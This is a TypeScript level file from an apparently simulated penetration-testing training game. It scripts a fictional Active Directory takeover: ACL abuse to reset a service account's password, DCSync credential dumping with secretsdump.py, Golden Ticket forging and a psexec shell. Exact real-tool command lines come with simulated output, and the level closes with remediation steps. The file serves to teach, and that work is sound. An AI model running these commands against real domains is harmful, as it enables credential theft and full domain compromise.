import type { ChainDef } from "../../types";
import { match, strictCmd } from "../../engine";

const IP = "192.0.2.90";
const DOMAIN = "thackeray.local";

export const ghostLevel9: ChainDef = {
  id: "ghost-9",
  difficulty: "ghost",
  order: 9,
  points: 320,
  title: "Inherited Rights",
  codename: "GHOST ASSESSMENT — INHERITED RIGHTS",
  summary: "No weak password to crack this time. A nested group membership grants a right nobody remembers assigning — and the account on the other end of it can read the entire domain's secrets.",
  briefing: [
    `TARGET: Thackeray Financial Group — domain controller — ${IP}`,
    `DOMAIN: ${DOMAIN}`,
    "YOU HAVE: a legitimate, low-privilege domain account — helpdesk1 : Winter2025!",
    "",
    "Assumed-breach assessment, same as before — except this time there's no Kerberoastable account",
    "and no cracked password waiting for you. Whatever gets you to Domain Admin here is written",
    "directly into the directory's own permissions.",
  ],
  debrief: [
    "root cause chain: helpdesk1 inherited GenericAll rights over a service account (svc_sql) through",
    "nested group membership nobody had audited (excessive ACL delegation, CWE-732) — enough to reset",
    "that account's password outright, no cracking required. svc_sql itself had been granted",
    "'Replicating Directory Changes' and 'Replicating Directory Changes All' at the domain root, rights",
    "meant for legitimate backup/replication software, which is exactly what a DCSync attack abuses to",
    "pull every credential straight out of the directory — including the krbtgt account's own hash.",
    "krbtgt's hash forges Kerberos tickets outright: a Golden Ticket grants Domain Admin access that",
    "survives ordinary password rotations, because it was never a password to begin with.",
    "",
    "THACKERAY FINANCIAL GROUP: SECURED.",
  ],
  nodes: [
    {
      id: "thackeray",
      org: "Thackeray Financial Group",
      city: "Thackeray",
      state: "OK",
      coords: { x: 48.3, y: 37.1 },
      ip: IP,
      tagline: "Regional financial services — Active Directory domain",
      briefing: [`IP: ${IP}`, `DOMAIN: ${DOMAIN}`, "No further information provided."],
      initialPrompt: "op@breachline:~$",
      motd: [],
      objectives: [
        { id: "recon", label: "Enumerate the domain controller's services", tactic: "Reconnaissance" },
        {
          id: "enum-acl",
          label: "Discover an inherited ACL right over a privileged service account",
          tactic: "Discovery",
          requires: ["recon"],
        },
        { id: "reset-password", label: "Abuse that right to reset the service account's password", tactic: "Credential Access", requires: ["enum-acl"] },
        {
          id: "discover-dcsync",
          label: "Discover the service account has directory-replication rights",
          tactic: "Discovery",
          requires: ["reset-password"],
        },
        { id: "dcsync", label: "Abuse replication rights to dump the domain's credentials, including krbtgt", tactic: "Privilege Escalation", requires: ["discover-dcsync"] },
        { id: "forge-ticket", label: "Forge a Golden Ticket from the krbtgt hash", tactic: "Persistence", requires: ["dcsync"] },
        { id: "use-ticket", label: "Use the forged ticket to reach the domain controller as Domain Admin", tactic: "Lateral Movement", requires: ["forge-ticket"] },
        { id: "loot", label: "Recover proof of Domain Admin access", tactic: "Collection", requires: ["use-ticket"] },
        { id: "secure", label: "Reset krbtgt twice, strip the excess ACL rights, and audit delegation domain-wide", tactic: "Remediation", requires: ["loot"] },
      ],
      hints: [
        "not every path to Domain Admin runs through a crackable password. directory permissions are inherited through nested group membership, and nobody audits those as often as they should — check what rights your account actually has over other objects, not just what group it's nominally in.",
        "GenericAll over another account is a full takeover primitive on its own — you don't need to crack anything if you can just set the password yourself.",
        "an account with 'Replicating Directory Changes' rights doesn't need an interactive session at all to pull every hash in the domain, including krbtgt — and krbtgt's hash is enough to forge a ticket for any account, valid until it's reset, which is precisely why real remediation resets it twice.",
      ],
      debrief: [],
      commands: [
        strictCmd({
          id: "nmap",
          tool: "nmap",
          requires: [IP],
          help: "nmap -sV <ip>",
          run: () => ({
            completesObjective: "recon",
            tone: "success",
            setsFlags: ["scanned"],
            output: [
              "PORT     STATE SERVICE VERSION",
              "88/tcp   open  kerberos-sec",
              "389/tcp  open  ldap",
              "445/tcp  open  microsoft-ds",
              "3389/tcp open  ms-wbt-server",
              "",
              "Nmap done: 1 IP address (1 host up) scanned in 4.70 seconds",
            ],
          }),
        }),
        strictCmd({
          id: "dacledit-read",
          tool: "dacledit.py",
          requires: [DOMAIN + "/helpdesk1", "-target", "svc_sql"],
          forbids: ["DC=" + DOMAIN.split(".")[0]],
          help: `dacledit.py -action read -target svc_sql ${DOMAIN}/helpdesk1:'Winter2025!'`,
          requiresFlags: ["scanned"],
          run: () => ({
            completesObjective: "enum-acl",
            tone: "success",
            setsFlags: ["found_acl"],
            note: "Thackeray Financial Group — helpdesk1 has GenericAll on svc_sql, inherited via nested Helpdesk-L2 group membership",
            output: [
              "ACE[1] info",
              "ACE Type          : ACCESS_ALLOWED",
              "Access mask       : GenericAll",
              "Trustee (SID)     : THACKERAY\\helpdesk1",
              "Inherited from     : THACKERAY\\Helpdesk-L2 (nested under Helpdesk-L1)",
              "",
              "[!] helpdesk1 has full control over svc_sql through a group nesting three levels deep —",
              "    nobody flagged this when Helpdesk-L2 was added to Helpdesk-L1's ACL.",
            ],
          }),
        }),
        strictCmd({
          id: "reset-password",
          tool: "net",
          requires: ["rpc password", "svc_sql"],
          help: `net rpc password svc_sql 'N3wP@ssw0rd!' -U ${DOMAIN}/helpdesk1%'Winter2025!' -S <ip>`,
          requiresFlags: ["found_acl"],
          run: () => ({
            completesObjective: "reset-password",
            tone: "success",
            setsFlags: ["have_svc_sql_creds"],
            note: "Thackeray Financial Group — svc_sql password reset via inherited GenericAll: N3wP@ssw0rd!",
            output: [
              "Password change successful for user 'svc_sql'",
              "",
              "[+] GenericAll over an account is a full takeover — no crack, no guess, just set the",
              "    password directly.",
            ],
          }),
        }),
        strictCmd({
          id: "dacledit-domain-root",
          tool: "dacledit.py",
          requires: [DOMAIN + "/svc_sql", "-target", "DC=" + DOMAIN.split(".")[0]],
          help: `dacledit.py -action read -target "DC=thackeray,DC=local" ${DOMAIN}/svc_sql:'N3wP@ssw0rd!'`,
          requiresFlags: ["have_svc_sql_creds"],
          run: () => ({
            completesObjective: "discover-dcsync",
            tone: "success",
            setsFlags: ["saw_dcsync_rights"],
            note: "Thackeray Financial Group — svc_sql has Replicating Directory Changes + Replicating Directory Changes All at the domain root (DCSync rights)",
            output: [
              "ACE Type          : ACCESS_ALLOWED_OBJECT",
              "Access mask       : ExtendedRight",
              "Object type       : Replicating Directory Changes All",
              "Trustee (SID)     : THACKERAY\\svc_sql",
              "",
              "[!] svc_sql was granted domain-replication rights for legitimate backup tooling — the",
              "    same rights a real domain controller uses to replicate, and exactly what DCSync abuses.",
            ],
          }),
        }),
        strictCmd({
          id: "dcsync",
          tool: "secretsdump.py",
          requires: ["-just-dc", DOMAIN + "/svc_sql"],
          help: `secretsdump.py -just-dc ${DOMAIN}/svc_sql:'N3wP@ssw0rd!'@<ip>`,
          requiresFlags: ["saw_dcsync_rights"],
          run: () => ({
            completesObjective: "dcsync",
            tone: "success",
            setsFlags: ["have_krbtgt_hash"],
            note: "Thackeray Financial Group — krbtgt NTLM hash recovered via DCSync: 1693c6cefaf1ad2c65c785a9012fbcda",
            output: [
              "[*] Using the DRSUAPI method to get NTDS.dit secrets",
              "thackeray.local\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1693c6cefaf1ad2c65c785a9012fbcda:::",
              "thackeray.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::",
              "",
              "[+] no interactive session was ever needed — replication rights alone dumped every",
              "    credential in the domain, krbtgt included.",
            ],
          }),
        }),
        strictCmd({
          id: "forge-ticket",
          tool: "ticketer.py",
          requires: ["1693c6cefaf1ad2c65c785a9012fbcda", "-domain", DOMAIN, "Administrator"],
          help: `ticketer.py -nthash 1693c6cefaf1ad2c65c785a9012fbcda -domain-sid S-1-5-21-3841879470-2100944256-1004293912 -domain ${DOMAIN} Administrator`,
          requiresFlags: ["have_krbtgt_hash"],
          run: () => ({
            completesObjective: "forge-ticket",
            tone: "success",
            setsFlags: ["have_golden_ticket"],
            note: "Thackeray Financial Group — Golden Ticket forged for Administrator (Administrator.ccache), valid until krbtgt is reset",
            output: [
              "[*] Creating basic skeleton ticket and PAC Infos",
              "[*] Signing/Encrypting final ticket",
              "[*] Saving ticket in Administrator.ccache",
              "",
              "[+] this ticket authenticates as Domain Admin without ever touching Administrator's real",
              "    password, and stays valid regardless of how many times that password gets rotated.",
            ],
          }),
        }),
        {
          id: "use-ticket",
          tool: "psexec.py",
          match: (input) => {
            const n = input.toLowerCase();
            return (
              n.includes("psexec.py") &&
              n.includes("-k") &&
              n.includes("-no-pass") &&
              n.includes("administrator") &&
              n.includes(DOMAIN)
            );
          },
          help: `KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass ${DOMAIN}/Administrator@<ip>`,
          requiresFlags: ["have_golden_ticket"],
          deniedOutput: ["you need a forged ticket in your credential cache before -k -no-pass authenticates as anyone."],
          run: () => ({
            completesObjective: "use-ticket",
            tone: "success",
            setsFlags: ["shell_access"],
            promptAfter: "C:\\Windows\\system32>",
            output: [
              "[*] Requesting shares on <ip>.....",
              "[*] Found writable share ADMIN$",
              "[*] Uploading file ...",
              "[*] Opening SVCManager on <ip>.....",
              "",
              "Microsoft Windows [Version 10.0.17763.1]",
              "",
              "[+] SYSTEM shell on the domain controller, authenticated entirely with a forged ticket.",
            ],
          }),
        },
        strictCmd({
          id: "loot",
          tool: "type",
          requires: ["proof.txt"],
          help: "type C:\\Users\\Administrator\\Desktop\\proof.txt",
          requiresFlags: ["shell_access"],
          run: () => ({
            completesObjective: "loot",
            tone: "success",
            note: "Thackeray Financial Group — proof.txt: e4da3b7fbbce2345d7772b0674a318d5",
            output: ["e4da3b7fbbce2345d7772b0674a318d5"],
          }),
        }),
        {
          id: "secure",
          tool: "secure",
          match: match.startsWith("secure system", "secure", "remediate"),
          help: "secure system",
          requiresObjectives: ["loot"],
          deniedOutput: ["confirm the full scope of the compromise before you file the fix."],
          run: () => ({
            completesObjective: "secure",
            tone: "success",
            output: [
              "[+] reset krbtgt's password twice in sequence, invalidating every forged ticket",
              "[+] removed svc_sql's directory-replication rights, scoped to only what backup tooling",
              "    actually requires",
              "[+] removed helpdesk1's inherited GenericAll over svc_sql and audited nested group",
              "    delegation domain-wide",
              "",
              "THACKERAY FINANCIAL GROUP: SECURED",
            ],
          }),
        },
      ],
    },
  ],
};
